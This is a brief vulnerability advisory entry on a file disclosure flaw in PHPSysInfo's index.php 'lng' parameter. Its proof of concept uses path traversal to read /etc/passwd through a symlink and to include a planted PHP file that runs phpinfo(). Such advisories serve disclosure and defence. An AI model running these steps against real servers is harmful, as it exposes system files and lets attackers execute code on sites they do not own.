|
PHPSysInfo Index.PHP LNG File Disclosure Vulnerability
The following proof of concept was provided: ~$ ln -s /etc/passwd /tmp/p.php http://www.example.com/index.php?lng=../../../../tmp/p ~$ echo "<?php phpinfo() ?>" > /tmp/p.php http://www.example.com/index.php?lng=../../../../tmp/p |
|
|
Privacy Statement |
